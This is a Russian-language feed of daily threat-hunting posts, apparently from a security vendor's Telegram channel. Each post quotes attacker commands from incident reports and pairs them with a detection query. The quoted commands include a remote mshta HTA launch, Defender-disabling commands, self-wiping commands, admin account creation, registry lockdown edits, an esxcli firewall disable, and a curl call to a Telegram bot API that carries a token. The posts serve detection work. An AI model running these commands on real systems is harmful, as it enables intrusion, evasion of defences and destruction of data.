Всем привет!
Сегодня понедельник, так что давайте посмотрим на классическую (по крайней мере, на мой взгляд) цель для проактивного поиска — System Binary Proxy Execution: Mshta (T1218.005).
Я снова наткнулся на это, просматривая отчёт о кластере активности, который мы отслеживаем как Lone Wolf. Противник использовал вредоносные LNK-файлы для развертывания Cobalt Strike Beacon.
Например, LNK выполняет следующую команду:
Как видите, здесь
Увидимся завтра!
English version
Сегодня понедельник, так что давайте посмотрим на классическую (по крайней мере, на мой взгляд) цель для проактивного поиска — System Binary Proxy Execution: Mshta (T1218.005).
Я снова наткнулся на это, просматривая отчёт о кластере активности, который мы отслеживаем как Lone Wolf. Противник использовал вредоносные LNK-файлы для развертывания Cobalt Strike Beacon.
Например, LNK выполняет следующую команду:
powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'hxxps://iplogger[.]cn/forensicsas.png'"
Как видите, здесь
mshta.exe используется для доступа к ссылке, которая перенаправляет на вредоносный HTA-файл. Поэтому, например, мы можем искать случаи, где mshta.exe обращается к подозрительным ссылкам:event_type: "processcreatewin"
AND
proc_file_path: "mshta.exe"
AND
cmdline: *http*
Увидимся завтра!
English version
🌭1
Всем привет!
Сегодня мы рассмотрим ещё один пример того, как противник злоупотребляет легитимными исполняемыми файлами Windows, чтобы обходить защиту.
На этот раз речь пойдет о
Эти команды отключают защиту в реальном времени (RTP) и облачные механизмы защиты, прекращают отправку отчётов об угрозах в Microsoft и не позволяют Windows Defender автоматически отправлять подозрительные файлы на анализ.
Стоит запроса, не так ли?
Увидимся завтра!
English version
Сегодня мы рассмотрим ещё один пример того, как противник злоупотребляет легитимными исполняемыми файлами Windows, чтобы обходить защиту.
На этот раз речь пойдет о
SystemSettingsAdminFlows.exe. Согласно этому отчёту, DeadLock использовали эту утилиту для отключения различных функций Windows Defender:SystemSettingsAdminFlows.exe Defender RTP 1
SystemSettingsAdminFlows.exe Defender SpynetReporting 0
SystemSettingsAdminFlows.exe Defender SubmitSamplesConsent 0
SystemSettingsAdminFlows.exe Defender DisableEnhancedNotifications 1
Эти команды отключают защиту в реальном времени (RTP) и облачные механизмы защиты, прекращают отправку отчётов об угрозах в Microsoft и не позволяют Windows Defender автоматически отправлять подозрительные файлы на анализ.
Стоит запроса, не так ли?
event_type: "processcreatewin"
AND
proc_file_path: "systemsettingsadminflows.exe"
AND
cmdline: "defender"
Увидимся завтра!
English version
❤5🔥2🌭1
Всем привет!
Мы уже несколько раз говорили об этом, но сегодня я заметил ещё один криминалистический инструмент в арсенале противника.
И да, это ещё один пример того, как злоумышленники могут получить дамп LSASS. На этот раз, согласно этому посту, они использовали MemProcFS, чтобы смонтировать дамп памяти скомпрометированной системы:
Если вы не занимаетесь реагированием на инциденты, запуск MemProcFS — довольно подозрительное событие, и точно стоит запроса:
Увидимся завтра!
English version
Мы уже несколько раз говорили об этом, но сегодня я заметил ещё один криминалистический инструмент в арсенале противника.
И да, это ещё один пример того, как злоумышленники могут получить дамп LSASS. На этот раз, согласно этому посту, они использовали MemProcFS, чтобы смонтировать дамп памяти скомпрометированной системы:
memprocfs.exe -device dump.dmp
Если вы не занимаетесь реагированием на инциденты, запуск MemProcFS — довольно подозрительное событие, и точно стоит запроса:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "memprocfs.exe"
Увидимся завтра!
English version
👍3🤣1
Всем привет!
Во многих случаях противник удаляет артефакты со компрометированных систем, поэтому сегодня мы рассмотрим несколько примеров техники Indicator Removal: File Deletion (T1070.004).
Наш сегодняшний пример — вымогатель 01flip. У него есть варианты как для Windows, так и для Linux.
Вариант для Windows удаляет сам себя с помощью следующей команды:
Как видите, он злоупотребляет
Вариант для Linux выполняет следующую команду:
Здесь злоумышленник использует
Увидимся завтра!
English version
Во многих случаях противник удаляет артефакты со компрометированных систем, поэтому сегодня мы рассмотрим несколько примеров техники Indicator Removal: File Deletion (T1070.004).
Наш сегодняшний пример — вымогатель 01flip. У него есть варианты как для Windows, так и для Linux.
Вариант для Windows удаляет сам себя с помощью следующей команды:
ping 127.0.0.7 -n 5 > Nul & fsutil file setZeroData offset=0 length=4194303 ${self_name} > Nul & Del /f /q ${self_name}Как видите, он злоупотребляет
fsutil, чтобы очистить содержимое файла. Мы можем искать подобную активность:event_type: "processcreatewin"
AND
proc_file_path: "fsutil.exe"
AND
cmdline: ("file" AND "setzerodata")
Вариант для Linux выполняет следующую команду:
sleep 5 && dd if=/dev/urandom of=${self_name} bs=1M count=4 > /dev/null 2>&1 && rm ${self_name} > /dev/null 2>&1Здесь злоумышленник использует
dd, и это ещё одна возможность для охоты:event_type: "processcreatenix"
AND
proc_file_path: "dd"
AND
cmdline: "urandom"
Увидимся завтра!
English version
👍1
Всем привет!
Злоумышленники часто используют скомпрометированные учетные данные, но в некоторых случаях они могут создавать новые аккаунты. И иногда эти аккаунты довольно уникальны, поэтому мы можем использовать их для обнаружения и охоты.
Как всегда, нам нужны примеры. Давайте взглянем на этот отчёт. Противник создал новые учётные записи администраторов со следующими именами:
События создания подозрительных пользователей могут быть отличными целями для охоты, поэтому убедитесь, что вы документируете их не только для атрибуции и кластеризации, но также и для детектирования:
Увидимся завтра!
English version
Злоумышленники часто используют скомпрометированные учетные данные, но в некоторых случаях они могут создавать новые аккаунты. И иногда эти аккаунты довольно уникальны, поэтому мы можем использовать их для обнаружения и охоты.
Как всегда, нам нужны примеры. Давайте взглянем на этот отчёт. Противник создал новые учётные записи администраторов со следующими именами:
backupadmin, admin_gpo и lapsadmin1. Например:cmd.exe /c net user backupadmin abcd1234
События создания подозрительных пользователей могут быть отличными целями для охоты, поэтому убедитесь, что вы документируете их не только для атрибуции и кластеризации, но также и для детектирования:
event_type: "usercreatewin"
AND
usr_tgt_name: ("backupadmin" OR "admin_gpo" OR "lapsadmin1")
Увидимся завтра!
English version
🤔1
Всем привет!
Мы уже несколько раз говорили о Modify Registry (T1112), но я заметил ещё несколько интересных процедур, так что давайте на них посмотрим.
Наш сегодняшний пример — VolkLocker. У него есть несколько любопытных особенностей, связанных с изменением реестра.
Он отключает Диспетчер задач:
Отключает Редактор реестра:
Отключает командную строку Windows:
Удаляет диалог «Выполнить»:
Удаляет пункты «Завершение работы», «Перезагрузка», «Спящий режим»:
Скрывает диск C:\:
Как видите, у нас здесь множество возможностей для обнаружения. Например:
Увидимся завтра!
English version
Мы уже несколько раз говорили о Modify Registry (T1112), но я заметил ещё несколько интересных процедур, так что давайте на них посмотрим.
Наш сегодняшний пример — VolkLocker. У него есть несколько любопытных особенностей, связанных с изменением реестра.
Он отключает Диспетчер задач:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
Отключает Редактор реестра:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
Отключает командную строку Windows:
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
Удаляет диалог «Выполнить»:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
Удаляет пункты «Завершение работы», «Перезагрузка», «Спящий режим»:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
Скрывает диск C:\:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 4
Как видите, у нас здесь множество возможностей для обнаружения. Например:
event_type: "registryvaluesetwin"
AND
reg_key_path: ("DisableTaskMgr" OR "DisableRegistryTools" OR "DisableCMD" OR "NoRun" OR "NoClose" OR "NoDrives")
Увидимся завтра!
English version
❤2👍1😁1
Всем привет!
Злоумышленники могут скрывать вредоносный контент где угодно, в том числе в абсолютно легитимных файлах, поэтому сегодня мы рассмотрим следующую технику — Obfuscated Files or Information: Steganography (T1027.003).
В некоторых случаях атакующие могут использовать вполне обычное вредоносное ПО, но при этом применять интересные техники. Как раз как в этом случае.
Злоумышленник использовал вредоносные LNK-файлы для запуска команды, которая извлекала и выполняла вредоносный скрипт из файла субтитров:
Интересно, правда? Мы можем охотиться за похожей активностью:
Увидимся завтра!
English version
Злоумышленники могут скрывать вредоносный контент где угодно, в том числе в абсолютно легитимных файлах, поэтому сегодня мы рассмотрим следующую технику — Obfuscated Files or Information: Steganography (T1027.003).
В некоторых случаях атакующие могут использовать вполне обычное вредоносное ПО, но при этом применять интересные техники. Как раз как в этом случае.
Злоумышленник использовал вредоносные LNK-файлы для запуска команды, которая извлекала и выполняла вредоносный скрипт из файла субтитров:
cmd.exe /c type Part2.subtitles.srt | more | findstr /n "^" | findstr "100: 101: 102: 103:" | for /f "tokens=1,* delims=:" %a in ('more') do cmd /c %bИнтересно, правда? Мы можем охотиться за похожей активностью:
event_type: "processcreatewin"
AND
proc_file_path: "cmd.exe"
AND
cmdline: ("type" AND "findstr" AND *.srt)
Увидимся завтра!
English version
🔥1
Друзья, всем привет!
Регистрируйтесь на предновогодний эфир и задавайте вопросы - за лучшие вручим эксклюзивные подарки!
Регистрируйтесь на предновогодний эфир и задавайте вопросы - за лучшие вручим эксклюзивные подарки!
Forwarded from BI.ZONE
This media is not supported in your browser
VIEW IN TELEGRAM
Несем вам под елочку последние новости нашей киберразведки.
В конце года соберемся, чтобы рассказать о 5 самых заметных трендах ландшафта киберугроз в России и других странах СНГ в 2025 году. А еще покажем, как применить знания на практике, чтобы усилить защиту компании в 2026-м.
18 декабря в 11:00 (мск) обсудим:
Задавайте вопросы при регистрации на эфир. За самые интересные мы вручим наш лимитированный мерч.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤1🦄1
Всем привет!
DLL Side-Loading становится всё более популярным среди злоумышленников, распространяющих массовое вредоносное ПО, поэтому сегодня мы рассмотрим технику Hijack Execution Flow: DLL (T1574.001).
Злоумышленник использовал переименованную версию
Атакующие использовали различные имена для легитимного исполняемого файла, например:
Таким образом, одной из возможностей для охоты за подобной активностью — поиск
Увидимся завтра!
English version
DLL Side-Loading становится всё более популярным среди злоумышленников, распространяющих массовое вредоносное ПО, поэтому сегодня мы рассмотрим технику Hijack Execution Flow: DLL (T1574.001).
Злоумышленник использовал переименованную версию
FoxitPDFReader.exe для загрузки вредоносной msimg32.dll, которая запускает цепочку, приводящую к загрузке PureRAT.Атакующие использовали различные имена для легитимного исполняемого файла, например:
Authentic_Job_Application_Form.exe
Project_Salary_Commission_and Benefits.exe
Compensation, Incentives, and Benefits for project participation.exe
Compensation_Benefits_Commission.exe
Digital_Marketing_Proficiency_Test.exe
Salary, Incentives, and Benefits for the Project.exe
Marketing_Performance_Test_Assignment.exe
Commission_Structure.exe
Salary_Incentives_and_Benefits_for_the_Project.exe
Pay_Benefits_Commission_Plan.exe
Таким образом, одной из возможностей для охоты за подобной активностью — поиск
FoxitPDFReader.exe с нетипичными именами:event_type: "processcreatewin"
AND
proc_file_originalfilename: "FoxitPDFReader.exe"
AND NOT
proc_file_path: "FoxitPDFReader.exe"
Увидимся завтра!
English version
👍2🤡2🗿1
Привет всем!
В некоторых случаях злоумышленникам не требуется выделенная инфраструктура C2. Они могут использовать следующую технику: Web Service (T1102).
UNC5174, например, использовал API Discord в качестве своего C2-канала. Такой подход позволил противнику имитировать легитимный трафик и обходить существующие политики безопасности.
К сожалению, домены, связанные с Discord, могут использоваться различным легитимным программным обеспечением, но всё равно это отличная цель для проактивного поиска угроз, так как это уже не первый случай, когда злоумышленники злоупотребляют ими:
Увидимся завтра!
English version
В некоторых случаях злоумышленникам не требуется выделенная инфраструктура C2. Они могут использовать следующую технику: Web Service (T1102).
UNC5174, например, использовал API Discord в качестве своего C2-канала. Такой подход позволил противнику имитировать легитимный трафик и обходить существующие политики безопасности.
К сожалению, домены, связанные с Discord, могут использоваться различным легитимным программным обеспечением, но всё равно это отличная цель для проактивного поиска угроз, так как это уже не первый случай, когда злоумышленники злоупотребляют ими:
event_type: ("dnsreqwin" OR "dnsreqnix")
AND
dns_rname: ("discord.com" OR "discord.gg")
AND NOT
proc_file_path: *discord*Увидимся завтра!
English version
❤5🤡1
Всем привет!
Давайте рассмотрим ещё один любопытный случай того, как злоумышленники злоупотребляют легитимными веб-сервисами для решения различных задач. На этот раз мы посмотрим, как они используют Telegram для получения уведомлений.
Наш сегодняшний пример — DeerStealer. Как вы можете видеть, злоумышленники использовали
Подобная активность может быть и легитимной — администраторы могут использовать Telegram для получения уведомлений, если что-то пошло не так. Тем не менее, это всё равно хорошая цель для проактивного поиска:
Увидимся завтра!
English version
Давайте рассмотрим ещё один любопытный случай того, как злоумышленники злоупотребляют легитимными веб-сервисами для решения различных задач. На этот раз мы посмотрим, как они используют Telegram для получения уведомлений.
Наш сегодняшний пример — DeerStealer. Как вы можете видеть, злоумышленники использовали
curl.exe, чтобы получить уведомление о том, что вредоносная нагрузка была выполнена:C:\WINDOWS\system32\cmd.exe /d /s /c "curl -s -X POST https://api.telegram.org/bot7972762095:AAE_DZEcCA4tkMpVK-peSGL6x4j4GMgl-3g/sendMessage -d chat_id=8093548175 -d text="undefined - executable запущен""
Подобная активность может быть и легитимной — администраторы могут использовать Telegram для получения уведомлений, если что-то пошло не так. Тем не менее, это всё равно хорошая цель для проактивного поиска:
event_type: "processcreatewin"
AND
proc_file_path: "curl.exe"
AND
cmdline: *telegram*
Увидимся завтра!
English version
🔥2🤡1
Привет всем!
Сегодня мы рассмотрим ещё несколько примеров того, как злоумышленники намеренно ослабляют уровень безопасности Windows, чтобы облегчить закрепление в системе и продвижение по ИТ-инфраструктуре.
Согласно отчёту, Ink Dragon изменял различные параметры реестра Windows для ослабления защитных механизмов: включал ограниченный администраторский режим (DisableRestrictedAdmin), отключал фильтрацию токенов для удалённых подключений (LocalAccountTokenFilterPolicy), включал учётную запись администратора DSRM (DsrmAdminLogonBehavior), а также отключал защиту уровня Process Protection Level (RunAsPPL).
Все эти поведенческие маркеры являются неплохими целями для проактивного поиска, например:
Увидимся завтра!
English version
Сегодня мы рассмотрим ещё несколько примеров того, как злоумышленники намеренно ослабляют уровень безопасности Windows, чтобы облегчить закрепление в системе и продвижение по ИТ-инфраструктуре.
Согласно отчёту, Ink Dragon изменял различные параметры реестра Windows для ослабления защитных механизмов: включал ограниченный администраторский режим (DisableRestrictedAdmin), отключал фильтрацию токенов для удалённых подключений (LocalAccountTokenFilterPolicy), включал учётную запись администратора DSRM (DsrmAdminLogonBehavior), а также отключал защиту уровня Process Protection Level (RunAsPPL).
Все эти поведенческие маркеры являются неплохими целями для проактивного поиска, например:
event_type: "registryvaluesetwin"
AND
reg_key_path: "localaccounttokenfilterpolicy"
AND
reg_value_data: "0x00000001"
Увидимся завтра!
English version
🔥3🤡1
Всем привет!
Давайте рассмотрим ещё один интересный пример того, как злоумышленники злоупотребляют легитимной инфраструктурой для C2. На этот раз — Fastly.
Kaspersky раскрыла очередную кампанию ForumTroll. В этот раз противник использовал Tuoni — коммерческий фреймворк для Red Teaming. При этом злоумышленники применяли тот же сервис для C2, что и в предыдущих кампаниях, — Fastly.
Что это значит? Мы можем использовать это в наших Threat Hunting миссиях!
Увидимся завтра!
English version
Давайте рассмотрим ещё один интересный пример того, как злоумышленники злоупотребляют легитимной инфраструктурой для C2. На этот раз — Fastly.
Kaspersky раскрыла очередную кампанию ForumTroll. В этот раз противник использовал Tuoni — коммерческий фреймворк для Red Teaming. При этом злоумышленники применяли тот же сервис для C2, что и в предыдущих кампаниях, — Fastly.
Что это значит? Мы можем использовать это в наших Threat Hunting миссиях!
event_type: "dnsreqwin"
AND
dns_rname: "fastly.net"
Увидимся завтра!
English version
🔥2🤡2👎1😁1
Всем привет!
Мы часто видим, как злоумышленники скрывают окна консоли. Но они также могут просто вынести их за пределы экрана! Давайте рассмотрим такой пример.
В этот раз мы посмотрим на Cloud Atlas (или Cloud Werewolf, как мы его отслеживаем). Злоумышленник изменил следующие ключи реестра, чтобы скрыть окна консоли:
Довольно интересно, правда? Разумеется, мы можем искать подозрительные события изменения реестра:
Увидимся завтра!
English version
Мы часто видим, как злоумышленники скрывают окна консоли. Но они также могут просто вынести их за пределы экрана! Давайте рассмотрим такой пример.
В этот раз мы посмотрим на Cloud Atlas (или Cloud Werewolf, как мы его отслеживаем). Злоумышленник изменил следующие ключи реестра, чтобы скрыть окна консоли:
HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe :: WindowPosition :: 5122
HKCU\UConsole\taskeng.exe :: WindowPosition :: 538126692
Довольно интересно, правда? Разумеется, мы можем искать подозрительные события изменения реестра:
event_type: "registryvaluesetwin"
AND
reg_key_path: "windowposition"
Увидимся завтра!
English version
🔥2🤡2👎1
Всем привет!
Когда мы говорим о группировках, использующих программы-вымогатели, мы почти всегда говорим о Command and Scripting Interpreter: Hypervisor CLI (T1059.012).
Да, банды вымогателей его обожают! Давайте посмотрим на RansomHouse, и сосредоточимся на MrAgent. Чтобы получить MAC-адрес, он выполняет следующую команду:
Для сбора информации об IP-адресе выполняется следующая команда:
Также с помощью ESXCLI отключается фаервол:
Таким образом, например, мы можем искать подозрительные команды, связанные с управлением сетевыми настройками хоста:
Увидимся завтра!
English version
Когда мы говорим о группировках, использующих программы-вымогатели, мы почти всегда говорим о Command and Scripting Interpreter: Hypervisor CLI (T1059.012).
Да, банды вымогателей его обожают! Давайте посмотрим на RansomHouse, и сосредоточимся на MrAgent. Чтобы получить MAC-адрес, он выполняет следующую команду:
esxcli --formatter=csv network nic list
Для сбора информации об IP-адресе выполняется следующая команда:
esxcli --formatter=csv network nic list
Также с помощью ESXCLI отключается фаервол:
esxcli network firewall set --enabled false
Таким образом, например, мы можем искать подозрительные команды, связанные с управлением сетевыми настройками хоста:
event_type: "processcreatenix"
AND
cmdline: ("esxcli" AND "network")
Увидимся завтра!
English version
🔥2🤡1
Всем привет!
Возможно, вы уже немного устали от того, что различные легитимные веб-сервисы используются злоумышленниками, но такие сервисы всегда являются хорошими целями для хантинга, поэтому давайте рассмотрим ещё один пример.
На этот раз злоумышленники использовали
Такие файлы содержали стеганографически внедрённую base64-кодированную сборку .NET, скрытую в конце файла. Кроме того, для её загрузки и выполнения злоумышленники использовали PowerShell.
Зная всё это, мы можем составить hunting-запрос:
Увидимся завтра!
English version
Возможно, вы уже немного устали от того, что различные легитимные веб-сервисы используются злоумышленниками, но такие сервисы всегда являются хорошими целями для хантинга, поэтому давайте рассмотрим ещё один пример.
На этот раз злоумышленники использовали
Archive[.]org для хранения вредоносных PNG-файлов, например:hxxp://dn710107.ca.archive[.]org/0/items/msi-pro-with-b-64_20251208_1511/MSI_PRO_with_b64[.]png
Такие файлы содержали стеганографически внедрённую base64-кодированную сборку .NET, скрытую в конце файла. Кроме того, для её загрузки и выполнения злоумышленники использовали PowerShell.
Зная всё это, мы можем составить hunting-запрос:
event_type: "dnsreqwin"
AND
dns_rname: "archive.org"
AND
proc_file_path: "powershell.exe"
Увидимся завтра!
English version
👍3
Всем привет!
Сегодня мы рассмотрим пример, предоставленный коллегами из Zscaler в их недавнем исследовании. И да — это снова злоупотребление легитимными сервисами!
Итак, согласно исследованию, команда Zscaler Threat Hunting зафиксировала локализованный всплеск трафика к сервису сокращения URL
Таким образом, перед нами реальный пример того, как защитники, используя знания о легитимных веб-сервисах, которыми злоупотребляют атакующие, смогли сформировать гипотезу и обнаружить ранее невыявленную вредоносную активность.
Вы можете сделать то же самое:
Увидимся завтра!
English version
Сегодня мы рассмотрим пример, предоставленный коллегами из Zscaler в их недавнем исследовании. И да — это снова злоупотребление легитимными сервисами!
Итак, согласно исследованию, команда Zscaler Threat Hunting зафиксировала локализованный всплеск трафика к сервису сокращения URL
surl[.]li. Этот сервис использовался злоумышленником (SideWinder) для перенаправления жертвы на фишинговую страницу со ссылкой на gofile[.]io, который применялся для размещения ZIP-архивов с набором файлов, включая вредоносные.Таким образом, перед нами реальный пример того, как защитники, используя знания о легитимных веб-сервисах, которыми злоупотребляют атакующие, смогли сформировать гипотезу и обнаружить ранее невыявленную вредоносную активность.
Вы можете сделать то же самое:
event_type: "dnsreqwin"
AND
dns_rname: ("surl.li" OR "gofile.io")
Увидимся завтра!
English version
👍1🔥1
Всем привет!
Пришло время взглянуть на ещё один интересный RMM, который злоумышленники используют для резервного доступа, и проверить, покрывают ли его ваши детекты.
Согласно этому отчёту, противник загрузил в скомпрометированную систему переименованную копию GotoHTTP. Интересно, что злоумышленникам достаточно просто установить этот RMM в систему, которой они хотят управлять, а для управления им нужен всего лишь веб-браузер!
Например, вы можете искать связанные сетевые сетевые соединения:
Также, разумеется, и сам бинарный файл:
Увидимся завтра!
English version
Пришло время взглянуть на ещё один интересный RMM, который злоумышленники используют для резервного доступа, и проверить, покрывают ли его ваши детекты.
Согласно этому отчёту, противник загрузил в скомпрометированную систему переименованную копию GotoHTTP. Интересно, что злоумышленникам достаточно просто установить этот RMM в систему, которой они хотят управлять, а для управления им нужен всего лишь веб-браузер!
Например, вы можете искать связанные сетевые сетевые соединения:
event_type: "dnsreqwin"
AND
dns_rname: "gotohttp.com"
Также, разумеется, и сам бинарный файл:
event_type: "processcreatewin"
AND
proc_file_productname: "gotohttp"
Увидимся завтра!
English version
🔥2
Всем привет!
Как вы знаете, злоумышленники могут удалять вредоносные файлы и инструменты для обхода защитных механизмов. Но можем ли мы использовать это для threat hunting? Давайте разберёмся!
Нам, конечно, нужен пример. Давайте посмотрим на загрузчик Amadey, описанный в этом отчёте. Злоумышленник использовал несколько команд для удаления существующего вредоносного файла и перемещения его копии в другое место:
Например, мы можем искать последовательности подозрительных команд, таких как
Увидимся завтра!
English version
Как вы знаете, злоумышленники могут удалять вредоносные файлы и инструменты для обхода защитных механизмов. Но можем ли мы использовать это для threat hunting? Давайте разберёмся!
Нам, конечно, нужен пример. Давайте посмотрим на загрузчик Amadey, описанный в этом отчёте. Злоумышленник использовал несколько команд для удаления существующего вредоносного файла и перемещения его копии в другое место:
cmd.exe /k "taskkill /f /im "Yfgfwb.exe" && timeout 1 && del "Yfgfwb.exe" && ren 07072f Yfgfwb.exe && C:\Users\UserName\Appdata\Local\Temp\067640a009\Yfgfwb.exe && Exit
Например, мы можем искать последовательности подозрительных команд, таких как
taskkill и del:event_type: "processcreatewin"
AND
proc_file_path: "cmd.exe"
AND
cmdline: ("taskkill" AND "del")
Увидимся завтра!
English version
🔥2🤡1